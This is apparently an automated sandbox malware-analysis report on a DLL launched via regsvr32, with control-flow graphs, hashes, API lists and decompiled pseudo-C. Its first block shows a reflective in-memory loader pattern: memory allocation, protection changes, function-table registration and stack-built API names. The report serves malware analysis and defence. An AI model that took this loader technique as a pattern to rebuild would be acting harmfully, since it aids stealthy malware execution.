                                                                                                      • String ID: $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$E$E$E$E$E$E$E$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                                                                                      • API String ID: 0-872547024
                                                                                                      • Opcode ID: 8d8e41402fa9ade4c982e5b92e0f0906a787b6072c1ffc9a98ef163c959b00e9
                                                                                                      • Instruction ID: 858c04658e9bd5cfdbbdf0f8453f17c4fb93009d8263aec933ce3c1422668745
                                                                                                      • Opcode Fuzzy Hash: 8d8e41402fa9ade4c982e5b92e0f0906a787b6072c1ffc9a98ef163c959b00e9
                                                                                                      • Instruction Fuzzy Hash: 37A36E1250DBC1C9E332C23CB45878FAE8193A3319F484299D3E41AADBC7AE8155DF67
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 53 e10000-e1029a call e1091c * 2 66 e102a0-e102a4 53->66 67 e10905 53->67 66->67 68 e102aa-e102ae 66->68 69 e10907-e1091a 67->69 68->67 70 e102b4-e102b8 68->70 70->67 71 e102be-e102c5 70->71 71->67 72 e102cb-e102dc 71->72 72->67 73 e102e2-e102eb 72->73 73->67 74 e102f1-e102fc 73->74 74->67 75 e10302-e10312 74->75 76 e10314-e1031a 75->76 77 e1033f-e10371 GetNativeSystemInfo 75->77 78 e1031c-e10324 76->78 77->67 79 e10377-e10393 VirtualAlloc 77->79 80 e10326-e1032a 78->80 81 e1032c-e1032d 78->81 82 e10395-e103a8 79->82 83 e103aa-e103ae 79->83 84 e1032f-e1033d 80->84 81->84 82->83 85 e103b0-e103c2 83->85 86 e103dc-e103e3 83->86 84->77 84->78 90 e103d4-e103d8 85->90 87 e103e5-e103f9 86->87 88 e103fb-e10417 86->88 87->87 87->88 91 e10419-e1041a 88->91 92 e10458-e10465 88->92 93 e103c4-e103d1 90->93 94 e103da 90->94 95 e1041c-e10422 91->95 96 e10537-e10542 92->96 97 e1046b-e10472 92->97 93->90 94->88 98 e10424-e10446 95->98 99 e10448-e10456 95->99 100 e106e6-e106ed 96->100 101 e10548-e10559 96->101 97->96 102 e10478-e10485 97->102 98->98 98->99 99->92 99->95 105 e106f3-e10707 100->105 106 e107ac-e107c3 100->106 103 e10562-e10565 101->103 102->96 104 e1048b-e1048f 102->104 107 e10567-e10574 103->107 108 e1055b-e1055f 103->108 109 e1051b-e10525 104->109 110 e107a9-e107aa 105->110 111 e1070d 105->111 112 e107c9-e107cd 106->112 113 e1087a-e1088d 106->113 116 e1057a-e1057d 107->116 117 e1060d-e10619 107->117 108->103 114 e10494-e104a8 109->114 115 e1052b-e10531 109->115 110->106 118 e10712-e10736 111->118 119 e107d0-e107d3 112->119 137 e108b3-e108ba 113->137 138 e1088f-e1089a 113->138 124 e104aa-e104cd 114->124 125 e104cf-e104d3 114->125 115->96 115->104 116->117 126 e10583-e1059b 116->126 122 e106e2-e106e3 117->122 123 e1061f 117->123 141 e10796-e1079f 118->141 142 e10738-e1073e 118->142 120 e107d9-e107e9 119->120 121 e1085f-e1086d 119->121 128 e107eb-e107ed 120->128 129 e1080d-e1080f 120->129 121->119 131 e10873-e10874 121->131 122->100 130 e10625-e10648 123->130 132 e10518-e10519 124->132 133 e104e3-e104e7 125->133 134 e104d5-e104e1 125->134 126->117 135 e1059d-e1059e 126->135 144 e107fb-e1080b 128->144 145 e107ef-e107f9 128->145 146 e10811-e10820 129->146 147 e10822-e1082b 129->147 164 e106b2-e106b7 130->164 165 e1064a-e1064b 130->165 131->113 132->109 139 e104e9-e104fc 133->139 140 e104fe-e10502 133->140 150 e10511-e10515 134->150 151 e105a0-e10605 135->151 148 e108eb-e10903 137->148 149 e108bc-e108c4 137->149 143 e108ab-e108b1 138->143 139->150 140->132 159 e10504-e1050e 140->159 141->118 158 e107a5-e107a6 141->158 153 e10740-e10746 142->153 154 e10748-e10754 142->154 143->137 155 e1089c-e108a8 143->155 160 e1082e-e1083d 144->160 145->160 146->160 147->160 148->69 149->148 157 e108c6-e108e9 RtlAddFunctionTable 149->157 150->132 151->151 152 e10607 151->152 152->117 161 e1077b-e1078d 153->161 162 e10764-e10776 154->162 163 e10756-e10757 154->163 155->143 157->148 158->110 159->150 166 e1084b-e1085c VirtualProtect 160->166 167 e1083f-e10845 160->167 161->141 179 e1078f-e10794 161->179 162->161 170 e10759-e10762 163->170 172 e106b9-e106bd 164->172 173 e106ce-e106d8 164->173 171 e1064e-e10651 165->171 166->121 167->166 170->162 170->170 176 e10653-e10659 171->176 177 e1065b-e10666 171->177 172->173 174 e106bf-e106c3 172->174 173->130 178 e106de-e106df 173->178 174->173 183 e106c5 174->183 180 e1068d-e106a3 176->180 181 e10676-e10688 177->181 182 e10668-e10669 177->182 178->122 179->142 186 e106a5-e106aa 180->186 187 e106ac 180->187 181->180 184 e1066b-e10674 182->184 183->173 184->181 184->184 186->171 187->164
                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE ref: 00E10344
                                                                                                      • VirtualAlloc.KERNELBASE ref: 00E1038A
                                                                                                      • VirtualProtect.KERNELBASE ref: 00E1085C
                                                                                                      • RtlAddFunctionTable.KERNEL32 ref: 00E108E9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.318721516.0000000000E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_e10000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                      • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                      • API String ID: 998211078-3605381585
                                                                                                      • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction ID: 902fdd58aa32a46a3c8634fc12d5e61d4df02f2231afe789636a18b3edbb60ac
                                                                                                      • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction Fuzzy Hash: A8521430618B088BC729DF18D8856FAB7E1FB94304F14562DE89BD7251DB74E9C2CB86
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 311 7ff87c104194-7ff87c10419a 312 7ff87c1041d5-7ff87c10432c 311->312 313 7ff87c10419c-7ff87c10419f 311->313 320 7ff87c104332-7ff87c10434d call 7ff87c103da8 312->320 321 7ff87c10432e-7ff87c104330 312->321 315 7ff87c1041a1-7ff87c1041a4 313->315 316 7ff87c1041c9-7ff87c104208 call 7ff87c103f18 313->316 318 7ff87c1041a6-7ff87c1041a9 315->318 319 7ff87c1041bc __scrt_dllmain_crt_thread_attach 315->319 333 7ff87c104211-7ff87c104226 call 7ff87c103da8 316->333 334 7ff87c10420a-7ff87c10420c 316->334 325 7ff87c1041b5-7ff87c1041ba call 7ff87c103e58 318->325 326 7ff87c1041ab-7ff87c1041b4 318->326 327 7ff87c1041c1-7ff87c1041c8 319->327 331 7ff87c10434f-7ff87c104354 call 7ff87c104944 320->331 332 7ff87c104359-7ff87c104380 call 7ff87c103ed4 call 7ff87c103f04 call 7ff87c1040cc call 7ff87c1040f0 320->332 322 7ff87c104382-7ff87c104391 321->322 325->327 331->332 332->322 343 7ff87c104232-7ff87c104243 call 7ff87c103e18 333->343 344 7ff87c104228-7ff87c10422d call 7ff87c104944 333->344 338 7ff87c1042f9-7ff87c10430e 334->338 351 7ff87c104245-7ff87c104281 call 7ff87c104b90 call 7ff87c10416c call 7ff87c104b40 call 7ff87c10416c call 7ff87c104b6c call 7ff87c10a908 343->351 352 7ff87c1042ac-7ff87c1042b6 call 7ff87c1040cc 343->352 344->343 351->352 379 7ff87c104283-7ff87c10428a __scrt_dllmain_after_initialize_c 351->379 352->334 360 7ff87c1042bc-7ff87c1042c8 call 7ff87c104b88 352->360 366 7ff87c1042ee-7ff87c1042f4 360->366 367 7ff87c1042ca-7ff87c1042d4 call 7ff87c104030 360->367 366->338 367->366 373 7ff87c1042d6-7ff87c1042e9 call 7ff87c104a8c 367->373 373->366 379->352 380 7ff87c10428c-7ff87c1042a9 call 7ff87c10a8c4 379->380 380->352
                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00007FF87FF87C104194(void* __edx) {
                                                                                                      				void* _t5;
                                                                                                      
                                                                                                      				_t5 = __edx;
                                                                                                      				if (_t5 == 0) goto 0x7c1041d5;
                                                                                                      				if (_t5 == 0) goto 0x7c1041c9;
                                                                                                      				if (_t5 == 0) goto 0x7c1041bc;
                                                                                                      				if (__edx == 1) goto 0x7c1041b5;
                                                                                                      				return 1;
                                                                                                      			}




                                                                                                      0x7ff87c104198
                                                                                                      0x7ff87c10419a
                                                                                                      0x7ff87c10419f
                                                                                                      0x7ff87c1041a4
                                                                                                      0x7ff87c1041a9
                                                                                                      0x7ff87c1041b4

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3885183344-0
                                                                                                      • Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                      • Instruction ID: 63c8cf4d44079a84753c7e26bb6bf7211eeb2c9769b4f01f4dc0b103ab13bc44
                                                                                                      • Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                      • Instruction Fuzzy Hash: A3514A23E3C64385FB14AB61E9813BA26A0BF573C4F884035EA6D47697DE2CE4C58730
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 45%
                                                                                                      			E00007FF87FF87C101580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
                                                                                                      				char _v16;
                                                                                                      				char _v24;
                                                                                                      				long long _v32;
                                                                                                      				void* _v40;
                                                                                                      				long long _v48;
                                                                                                      				long long _v56;
                                                                                                      				void* _t41;
                                                                                                      				intOrPtr* _t49;
                                                                                                      				void* _t77;
                                                                                                      
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v32 = 0xfffffffe;
                                                                                                      				_t49 = _a16;
                                                                                                      				if (_a8 == _t49) goto 0x7c101693;
                                                                                                      				r8d = 0;
                                                                                                      				E00007FF87FF87C101910(1, _t49, _a8, _t77); // executed
                                                                                                      				if (0 == 1) goto 0x7c10160a;
                                                                                                      				E00007FF87FF87C101850(_a16);
                                                                                                      				_v56 = _t49;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				if ((E00007FF87FF87C102A50(_t49, _v56) & 0x000000ff) == 0) goto 0x7c10160a;
                                                                                                      				E00007FF87FF87C101850(_a16);
                                                                                                      				E00007FF87FF87C101870(_t49, _a8, _t49);
                                                                                                      				E00007FF87FF87C101850(_a16);
                                                                                                      				_v48 = _t49;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				if ((E00007FF87FF87C102A50(_t49, _v48) & 0x000000ff) == 0) goto 0x7c10167a;
                                                                                                      				E00007FF87FF87C101A20(_t49, _a16,  &_v24);
                                                                                                      				_v40 = _t49;
                                                                                                      				E00007FF87FF87C101AA0(_t49, _a16,  &_v16);
                                                                                                      				_t41 = E00007FF87FF87C102A90(E00007FF87FF87C102A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
                                                                                                      				goto 0x7c101693;
                                                                                                      				E00007FF87FF87C102B00(_t41, _a16);
                                                                                                      				return E00007FF87FF87C101F00(_t49, _a8, _t49);
                                                                                                      			}












                                                                                                      0x7ff87c101580
                                                                                                      0x7ff87c101585
                                                                                                      0x7ff87c10158e
                                                                                                      0x7ff87c101597
                                                                                                      0x7ff87c1015a1
                                                                                                      0x7ff87c1015a7
                                                                                                      0x7ff87c1015b1
                                                                                                      0x7ff87c1015bc
                                                                                                      0x7ff87c1015c3
                                                                                                      0x7ff87c1015c9
                                                                                                      0x7ff87c1015d3
                                                                                                      0x7ff87c1015ef
                                                                                                      0x7ff87c1015f6
                                                                                                      0x7ff87c101604
                                                                                                      0x7ff87c10160f
                                                                                                      0x7ff87c101615
                                                                                                      0x7ff87c10161f
                                                                                                      0x7ff87c10163b
                                                                                                      0x7ff87c101647
                                                                                                      0x7ff87c10164d
                                                                                                      0x7ff87c10165c
                                                                                                      0x7ff87c101672
                                                                                                      0x7ff87c101678
                                                                                                      0x7ff87c10167f
                                                                                                      0x7ff87c10169c

                                                                                                      APIs
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1015C3
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1015D3
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1015F6
                                                                                                        • Part of subcall function 00007FF87C101870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C101883
                                                                                                      • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FF87C1015E4
                                                                                                        • Part of subcall function 00007FF87C102A50: type_info::_name_internal_method.LIBCMTD ref: 00007FF87C102A68
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10160F
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10161F
                                                                                                      • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FF87C101630
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
                                                                                                      • String ID:
                                                                                                      • API String ID: 1937815552-0
                                                                                                      • Opcode ID: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
                                                                                                      • Instruction ID: a9581436a24e58de26ee5baf09c3c0adb15f62409edea51d922d924aa6db61bd
                                                                                                      • Opcode Fuzzy Hash: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
                                                                                                      • Instruction Fuzzy Hash: 6231213366DA4181DB10EB22E45157B6361FBC67C0F111536F9AD83BAADE2CE4C18B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 50%
                                                                                                      			E00007FF87FF87C102600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
                                                                                                      				long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				long long _v40;
                                                                                                      				void* _v64;
                                                                                                      				long long _v72;
                                                                                                      				long long _v80;
                                                                                                      				long long _v88;
                                                                                                      				long long _v96;
                                                                                                      				long long _v104;
                                                                                                      				char _v112;
                                                                                                      				signed long long _v120;
                                                                                                      				void* _t82;
                                                                                                      				signed long long _t111;
                                                                                                      				intOrPtr* _t113;
                                                                                                      				intOrPtr* _t114;
                                                                                                      				long long _t115;
                                                                                                      				intOrPtr* _t116;
                                                                                                      				intOrPtr* _t117;
                                                                                                      				signed long long _t118;
                                                                                                      				long long _t120;
                                                                                                      				long long* _t121;
                                                                                                      
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v24 = 0xfffffffe;
                                                                                                      				_t111 = _a16 | 0x0000000f;
                                                                                                      				_v120 = _t111;
                                                                                                      				E00007FF87FF87C102830(_t111, _a8);
                                                                                                      				if (_t111 - _v120 >= 0) goto 0x7c102659;
                                                                                                      				_v120 = _a16;
                                                                                                      				goto 0x7c102736;
                                                                                                      				_t113 = _v120;
                                                                                                      				_v104 = _t113;
                                                                                                      				E00007FF87FF87C102150(_t113, _a8);
                                                                                                      				_t114 =  *_t113;
                                                                                                      				if (_t114 - _v104 > 0) goto 0x7c102696;
                                                                                                      				goto 0x7c102736;
                                                                                                      				E00007FF87FF87C102150(_t114, _a8);
                                                                                                      				_t115 =  *_t114;
                                                                                                      				_v96 = _t115;
                                                                                                      				E00007FF87FF87C102830(_t115, _a8);
                                                                                                      				_t116 = _t115 - _v96;
                                                                                                      				_v88 = _t116;
                                                                                                      				E00007FF87FF87C102150(_t116, _a8);
                                                                                                      				if ( *_t116 - _v88 > 0) goto 0x7c102724;
                                                                                                      				E00007FF87FF87C102150(_t116, _a8);
                                                                                                      				_t117 =  *_t116;
                                                                                                      				_v80 = _t117;
                                                                                                      				E00007FF87FF87C102150(_t117, _a8);
                                                                                                      				_t118 = _v80 +  *_t117;
                                                                                                      				_v120 = _t118;
                                                                                                      				goto 0x7c102736;
                                                                                                      				E00007FF87FF87C102830(_t118, _a8);
                                                                                                      				_v120 = _t118;
                                                                                                      				_t120 = _v120 + 1;
                                                                                                      				_v72 = _t120;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				E00007FF87FF87C1028E0(_t120, _v72); // executed
                                                                                                      				_v64 = _t120;
                                                                                                      				_t121 = _v64;
                                                                                                      				_v112 = _t121;
                                                                                                      				goto 0x7c102771;
                                                                                                      				if (_a24 <= 0) goto 0x7c1027b0;
                                                                                                      				_t82 = E00007FF87FF87C1018F0(_t121, _a8);
                                                                                                      				_v40 = _t121;
                                                                                                      				E00007FF87FF87C102C00(_t82, _v112);
                                                                                                      				E00007FF87FF87C1011E0(_t121, _v40, _a24);
                                                                                                      				r8d = 0;
                                                                                                      				E00007FF87FF87C101910(1, _t121, _a8, _a24);
                                                                                                      				E00007FF87FF87C102BC0(E00007FF87FF87C102190(_a8), _t121);
                                                                                                      				_v32 = _t121;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				E00007FF87FF87C102C10(_t121, _t121, _v32,  &_v112);
                                                                                                      				E00007FF87FF87C102150(_t121, _a8);
                                                                                                      				 *_t121 = _v120;
                                                                                                      				return E00007FF87FF87C1023A0(_t121, _a8, _a24);
                                                                                                      			}
























                                                                                                      0x7ff87c102600
                                                                                                      0x7ff87c102605
                                                                                                      0x7ff87c10260a
                                                                                                      0x7ff87c102616
                                                                                                      0x7ff87c10262a
                                                                                                      0x7ff87c10262e
                                                                                                      0x7ff87c10263b
                                                                                                      0x7ff87c102645
                                                                                                      0x7ff87c10264f
                                                                                                      0x7ff87c102654
                                                                                                      0x7ff87c10265b
                                                                                                      0x7ff87c102668
                                                                                                      0x7ff87c102675
                                                                                                      0x7ff87c10267c
                                                                                                      0x7ff87c10268f
                                                                                                      0x7ff87c102691
                                                                                                      0x7ff87c10269e
                                                                                                      0x7ff87c1026a5
                                                                                                      0x7ff87c1026b0
                                                                                                      0x7ff87c1026bd
                                                                                                      0x7ff87c1026c7
                                                                                                      0x7ff87c1026ca
                                                                                                      0x7ff87c1026d7
                                                                                                      0x7ff87c1026e4
                                                                                                      0x7ff87c1026ee
                                                                                                      0x7ff87c1026f5
                                                                                                      0x7ff87c102700
                                                                                                      0x7ff87c10270d
                                                                                                      0x7ff87c10271a
                                                                                                      0x7ff87c10271d
                                                                                                      0x7ff87c102722
                                                                                                      0x7ff87c10272c
                                                                                                      0x7ff87c102731
                                                                                                      0x7ff87c10273b
                                                                                                      0x7ff87c10273e
                                                                                                      0x7ff87c10274b
                                                                                                      0x7ff87c10275b
                                                                                                      0x7ff87c102760
                                                                                                      0x7ff87c102765
                                                                                                      0x7ff87c10276a
                                                                                                      0x7ff87c10276f
                                                                                                      0x7ff87c10277a
                                                                                                      0x7ff87c102784
                                                                                                      0x7ff87c102789
                                                                                                      0x7ff87c102793
                                                                                                      0x7ff87c1027ab
                                                                                                      0x7ff87c1027b0
                                                                                                      0x7ff87c1027bd
                                                                                                      0x7ff87c1027d2
                                                                                                      0x7ff87c1027d7
                                                                                                      0x7ff87c1027e4
                                                                                                      0x7ff87c1027f9
                                                                                                      0x7ff87c102806
                                                                                                      0x7ff87c102810
                                                                                                      0x7ff87c10282f

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C102830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10283E
                                                                                                        • Part of subcall function 00007FF87C102830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FF87C10284B
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10274B
                                                                                                      • type_info::_name_internal_method.LIBCMTD ref: 00007FF87C10275B
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C102784
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C1027AB
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1027E4
                                                                                                      • construct.LIBCPMTD ref: 00007FF87C1027F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
                                                                                                      • String ID:
                                                                                                      • API String ID: 3284725307-0
